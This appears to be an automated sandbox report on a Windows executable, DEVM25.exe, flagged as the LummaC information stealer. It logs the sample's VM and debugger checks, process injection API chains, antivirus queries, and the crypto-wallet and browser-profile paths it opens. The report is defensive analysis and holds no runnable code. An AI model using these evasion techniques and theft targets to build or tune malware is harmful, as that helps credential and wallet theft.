Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: DEVM25.exe

Static file information: File size 1369600 > 1048576

Source: DEVM25.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7DFCA push ecx; ret	0_2_00B7DFDD
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00453046 push ebx; ret	2_2_0045304D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004531F8 push ebx; ret	2_2_004531F9
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00453BF8 push ecx; iretd	2_2_00453C3D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0045052C push ebx; ret	2_2_0045052D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B504F7 push ebx; iretd	2_2_00B504F9
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B504DD push ebx; iretd	2_2_00B504E3
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B7DFCA push ecx; ret	2_2_00B7DFDD
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B3A775 push es; iretd	2_2_00B3A776

Source: DEVM25.exe

Static PE information: section name: .text entropy: 7.09207256696417

Source: C:\Users\user\Desktop\DEVM25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\DEVM25.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\DEVM25.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe

Window / User API: threadDelayed 6664

Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe TID: 6036	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe TID: 6880	Thread sleep count: 6664 > 30			Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\DEVM25.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\DEVM25.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B8FCDE FindFirstFileExW,	0_2_00B8FCDE
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B8FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B8FD8F
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B8FCDE FindFirstFileExW,	2_2_00B8FCDE
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B8FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00B8FD8F

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191619829.0000000000A66000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1061343132.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672366638.0000000000A62000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1024433713.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1024569134.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1039872819.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191116958.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696497155p
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: DEVM25.exe, 00000002.00000003.989699487.00000000035A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\DEVM25.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\DEVM25.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 0_2_00B1553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,

0_2_00B1553B

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 0_2_00B7DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00B7DC9E

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 0_2_00BA61B4 mov edi, dword ptr fs:[00000030h]

0_2_00BA61B4

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 0_2_00B8B71C GetProcessHeap,

0_2_00B8B71C

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B7D8E2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7DC92 SetUnhandledExceptionFilter,	0_2_00B7DC92
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B7DC9E
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B85DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B85DCE
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B7D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00B7D8E2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B7DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00B7DC9E
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B85DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00B85DCE

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 0_2_00BA61B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00BA61B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DEVM25.exe

Memory written: C:\Users\user\Desktop\DEVM25.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe

Process created: C:\Users\user\Desktop\DEVM25.exe "C:\Users\user\Desktop\DEVM25.exe"

Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	0_2_00B8B007
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00B8F048
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	0_2_00B8F299
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00B8F334
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	0_2_00B8F587
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	0_2_00B8F6BB
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	0_2_00B8F7F5
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	0_2_00B8F8B3
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	0_2_00B8AB0C
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	2_2_00B8F8B3
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	2_2_00B8B007
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00B8F048
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	2_2_00B8F299
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00B8F334
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	2_2_00B8AB0C
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	2_2_00B8F587
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	2_2_00B8F5E6
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: EnumSystemLocalesW,	2_2_00B8F6BB
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00B8F7AD
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: GetLocaleInfoW,	2_2_00B8F706

Source: C:\Users\user\Desktop\DEVM25.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 0_2_00B7E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B7E6D7

Source: C:\Users\user\Desktop\DEVM25.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: DEVM25.exe, 00000002.00000003.1039872819.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191320554.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1039180910.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1039656050.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672446870.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1039180910.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1061343132.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1039346904.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe
Source: DEVM25.exe, 00000002.00000003.1040674968.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1061225731.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\DEVM25.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: DEVM25.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: 2.2.DEVM25.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.DEVM25.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2190447431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: DEVM25.exe, 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: DEVM25.exe, 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: DEVM25.exe, 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: DEVM25.exe, 00000002.00000003.1024433713.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: DEVM25.exe, 00000002.00000003.1039872819.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: DEVM25.exe, 00000002.00000003.1024433713.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: DEVM25.exe, 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: DEVM25.exe, 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
